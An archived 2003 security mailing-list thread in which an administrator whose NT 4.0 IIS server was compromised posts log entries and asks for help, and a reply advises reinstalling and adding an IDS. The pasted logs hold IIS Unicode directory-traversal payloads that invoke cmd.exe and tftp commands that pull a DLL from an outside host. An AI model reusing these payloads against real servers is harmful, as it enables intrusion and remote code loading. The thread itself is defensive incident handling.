|
|||||||||||
|
Re: Hacked web server
From: Tibor Biro <tiborbiro(at)rogers.com>
Date: Sun Jan 12 2003 - 18:43:08 EST
Looks like your server was hacked by using an old exploit, check out this
link for more information.
This vulnerability allows the hacker to get to your server through port 80 completely bypassing your firewall. You might want to consider installing an IDS, Snort comes to mind. If I were you I would reinstall the entire server from scratch, your guest might have opened some other doors. To trace the hacker you can start by doing a reverse lookup on the address you got in the IIS log file. If your server is not configured to receive email then your mailroot/drop folder should be empty. You can safely delete all files/folders from there.
Regards,
Hi... my web server (NT 4.0 SP6a) was hacked last friday, it has only
one NIC with a public IP
200.38.237.2, -, 5/01/03, 4:15:08, W3SVC, INGRESOS02, 200.38.152.221, 0, 72, 275, 403, 5, GET, /scripts/root.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 0, 70, 119, 404, 2, GET, /MSADC/root.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221,125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 0, 79, 221, 500, 126, GET, /scripts/..%5c../httpodbc.dll, -, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0,145, 261, 500, 123, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe , /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 261, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221,16, 97, 275, 403, 5, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..À¯../winnt/system32/cmd.exe, /c+dir, 200.38.237.2, -, 5/01/03, 4:15:11, W3SVC, INGRESOS02, 200.38.152.221, 0, 97, 275, 403, 5, GET, /scripts/..Áœ../winnt/system32/cmd.exe, /c+dir, i have read that it could be because of Nimda but i have scanned with the latest pattern and it found no viruses... only a backdoor trojan called ncx99.exe dropped in mailroot\drop\temp by the way, can i delete files inside that folder??? there's a rundlls32.exe... a KEY file, etcetera......
what can it be? i need help...
ISC. Rogelio Vidaurri Courcelle
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Sun Jan 12 20:43:09 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:56 EDT |
||||||||||
|
|||||||||||